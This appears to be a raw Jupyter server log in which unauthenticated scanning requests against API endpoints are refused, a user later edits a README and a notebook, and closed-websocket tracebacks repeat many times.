      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 269, in _unimplemented_method
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
[W 2024-08-02 03:44:16.089 TerminalsExtensionApp] 405 HEAD /api/terminals?1722521979964 (@123.249.116.30) 0.95ms referer=None
[W 2024-08-02 03:44:16.224 TerminalsExtensionApp] wrote error: 'Forbidden'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 3289, in wrapper
        url = self.get_login_url()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 783, in get_login_url
        raise web.HTTPError(403)
    tornado.web.HTTPError: HTTP 403: Forbidden
[W 2024-08-02 03:44:16.225 TerminalsExtensionApp] 403 GET /api/terminals?1722521979964 (@123.249.116.30) 0.92ms referer=None
[W 2024-08-02 03:46:47.571 ServerApp] wrote error: 'Method Not Allowed'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 269, in _unimplemented_method
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
[W 2024-08-02 03:46:47.572 ServerApp] 405 HEAD /api/sessions?1722523769288 (@123.249.116.81) 1.02ms referer=None
[W 2024-08-02 03:46:47.646 ServerApp] wrote error: 'Forbidden'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 3289, in wrapper
        url = self.get_login_url()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 783, in get_login_url
        raise web.HTTPError(403)
    tornado.web.HTTPError: HTTP 403: Forbidden
[W 2024-08-02 03:46:47.646 ServerApp] 403 GET /api/sessions?1722523769288 (@123.249.116.81) 0.91ms referer=None
[W 2024-08-02 03:50:05.902 ServerApp] wrote error: 'Method Not Allowed'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 269, in _unimplemented_method
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
[W 2024-08-02 03:50:05.903 ServerApp] 405 HEAD /api/contents?content=1&hash=0&1722523769605 (@123.249.91.159) 0.92ms referer=None
[W 2024-08-02 03:50:05.982 ServerApp] wrote error: 'Forbidden'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 3289, in wrapper
        url = self.get_login_url()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 783, in get_login_url
        raise web.HTTPError(403)
    tornado.web.HTTPError: HTTP 403: Forbidden
[W 2024-08-02 03:50:05.983 ServerApp] 403 GET /api/contents?content=1&hash=0&1722523769605 (@123.249.91.159) 0.96ms referer=None
[W 2024-08-02 03:51:20.562 ServerApp] wrote error: 'Method Not Allowed'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 269, in _unimplemented_method
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
[W 2024-08-02 03:51:20.563 ServerApp] 405 HEAD /api/kernels?1722522229326 (@123.249.91.159) 0.87ms referer=None
[W 2024-08-02 03:51:20.755 ServerApp] wrote error: 'Forbidden'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 3289, in wrapper
        url = self.get_login_url()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 783, in get_login_url
        raise web.HTTPError(403)
    tornado.web.HTTPError: HTTP 403: Forbidden
[W 2024-08-02 03:51:20.755 ServerApp] 403 GET /api/kernels?1722522229326 (@123.249.91.159) 1.07ms referer=None
[I 2024-08-02 04:11:46.855 ServerApp] 302 GET / (@178.128.224.223) 0.43ms
[W 2024-08-02 04:36:38.876 ServerApp] wrote error: 'Method Not Allowed'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 269, in _unimplemented_method
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
[W 2024-08-02 04:36:38.877 ServerApp] 405 HEAD /api/sessions?1722524563790 (@123.249.77.152) 1.14ms referer=None
[W 2024-08-02 04:36:38.924 ServerApp] wrote error: 'Forbidden'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 3289, in wrapper
        url = self.get_login_url()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 783, in get_login_url
        raise web.HTTPError(403)
    tornado.web.HTTPError: HTTP 403: Forbidden
[W 2024-08-02 04:36:38.924 ServerApp] 403 GET /api/sessions?1722524563790 (@123.249.77.152) 0.98ms referer=None
[E 2024-08-02 05:48:38.384 ServerApp] Uncaught exception in write_error
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1753, in _execute
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1298, in send_error
        self.write_error(status_code, **kwargs)
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 739, in write_error
        html = self.render_template("%s.html" % status_code, **ns)
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 665, in render_template
        ns.update(self.template_namespace)
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 675, in template_namespace
        logged_in=self.logged_in,
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 198, in logged_in
        user = self.current_user
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1424, in current_user
        self._current_user = self.get_current_user()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 177, in get_current_user
        raise RuntimeError(msg)
    RuntimeError: Calling `Template404.get_current_user()` directly is deprecated in jupyter-server 2.0. Use `self.current_user` instead (works in all versions).
[W 2024-08-02 05:48:38.384 ServerApp] 405 CONNECT example.com:443 (@23.176.184.7) 0.88ms referer=None
[I 2024-08-02 06:34:47.054 ServerApp] 302 GET / (@167.94.146.52) 0.61ms
[I 2024-08-02 06:34:56.560 ServerApp] 302 GET / (@167.94.146.52) 0.40ms
[I 2024-08-02 06:34:57.065 ServerApp] Malformed HTTP message from 167.94.146.52: Malformed HTTP version in HTTP Request-Line: 'HTTP/2.0'
[I 2024-08-02 06:35:00.592 JupyterNotebookApp] 302 GET /tree (@167.94.146.52) 0.57ms
[I 2024-08-02 06:35:01.322 ServerApp] Malformed HTTP message from 167.94.146.52: Malformed HTTP version in HTTP Request-Line: 'HTTP/2.0'
[I 2024-08-02 06:35:02.251 ServerApp] 302 GET / (@167.94.146.52) 0.60ms
[I 2024-08-02 06:35:09.742 ServerApp] Malformed HTTP message from 167.94.146.52: Malformed HTTP version in HTTP Request-Line: 'HTTP/2.0'
[I 2024-08-02 06:35:10.234 ServerApp] 302 GET / (@167.94.146.52) 0.44ms
[I 2024-08-02 06:36:56.431 ServerApp] 302 GET / (@92.249.48.208) 0.43ms
[I 2024-08-02 06:43:29.539 ServerApp] 302 GET / (@172.234.94.34) 0.48ms
[W 2024-08-02 06:43:29.688 ServerApp] 404 GET /v2/_catalog (@172.235.218.185) 1.49ms referer=None
[I 2024-08-02 06:43:29.690 ServerApp] 302 GET / (@172.235.218.174) 1.31ms
[W 2024-08-02 06:43:29.691 ServerApp] 404 GET /query?q=SHOW+DIAGNOSTICS (@172.235.218.131) 1.73ms referer=None
[W 2024-08-02 06:43:29.692 ServerApp] 404 GET /solr/admin/info/system (@172.235.218.149) 2.19ms referer=None
[W 2024-08-02 06:43:29.693 ServerApp] 404 GET /cgi-bin/authLogin.cgi (@172.235.218.149) 2.66ms referer=None
[I 2024-08-02 06:43:29.747 JupyterNotebookApp] 302 GET /tree? (@172.235.218.174) 0.55ms
[W 2024-08-02 06:43:29.801 ServerApp] 404 GET /solr/admin/cores?action=STATUS&wt=json (@172.235.218.149) 1.64ms referer=None
[I 2024-08-02 07:30:48.935 ServerApp] 302 GET / (@106.75.50.6) 0.42ms
[I 2024-08-02 07:30:48.968 JupyterNotebookApp] 302 GET /tree?/robots.txt (@106.75.50.6) 0.83ms
[I 2024-08-02 07:30:48.969 JupyterNotebookApp] 302 GET /tree?/sitemap.xml (@106.75.50.6) 0.60ms
[I 2024-08-02 07:31:00.826 JupyterNotebookApp] 302 GET /tree? (@106.75.50.6) 0.61ms
[I 2024-08-02 08:01:21.909 ServerApp] 302 GET / (@117.176.248.71) 0.38ms
[I 2024-08-02 08:01:23.001 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-02 08:01:23.158 ServerApp] Starting buffering for f4b02ff0-99f3-4fe2-a615-3fc19aa9b142:2aed0d11-ca58-4719-b349-fac0dca1a967
[I 2024-08-02 08:01:48.858 ServerApp] 302 GET / (@117.176.248.71) 0.43ms
[I 2024-08-02 08:01:49.893 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-02 08:01:50.031 ServerApp] Starting buffering for f4b02ff0-99f3-4fe2-a615-3fc19aa9b142:d676e5a8-652d-4e2d-8ebc-fc7394274f2a
[I 2024-08-02 08:02:00.647 LabApp] 301 GET /lab/ (5636fc03b89e47a6ad9cdef2595e0b00@117.176.248.71) 0.62ms
[W 2024-08-02 08:02:01.410 LabApp] Could not determine jupyterlab build status without nodejs
[I 2024-08-02 08:02:01.509 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-02 08:02:01.708 ServerApp] Starting buffering for f4b02ff0-99f3-4fe2-a615-3fc19aa9b142:34bebbd8-df9f-4f18-9d2b-fb8b071debe4
[I 2024-08-02 08:02:01.880 ServerApp] New terminal with automatic name: 3
[I 2024-08-02 08:02:02.595 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-02 08:02:40.301 ServerApp] Saving file at /Rampup2024/README.md
[I 2024-08-02 08:03:04.279 ServerApp] Saving file at /Rampup2024/README.md
[I 2024-08-02 08:03:09.939 ServerApp] Saving file at /Rampup2024/README.md
[I 2024-08-02 08:03:21.992 ServerApp] Saving file at /Rampup2024/README.md
[I 2024-08-02 08:03:53.386 ServerApp] Saving file at /Rampup2024/README.md
[I 2024-08-02 08:04:09.662 ServerApp] Saving file at /Rampup2024/README.md
[I 2024-08-02 08:04:22.925 ServerApp] Saving file at /Rampup2024/README.md
[I 2024-08-02 08:05:50.036 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 08:06:23.102 ServerApp] Saving file at /Rampup2024/README.md
[I 2024-08-02 08:07:50.290 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 08:21:50.580 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
Task exception was never retrieved
future: <Task finished name='Task-34758' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34764' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34766' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34780' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34784' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34788' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34792' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34798' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34800' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34813' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34817' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34821' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34825' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34831' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34833' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34847' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34851' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34855' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34859' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34865' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34867' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34880' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34884' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34888' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34892' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34898' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34900' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34912' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34916' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34920' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
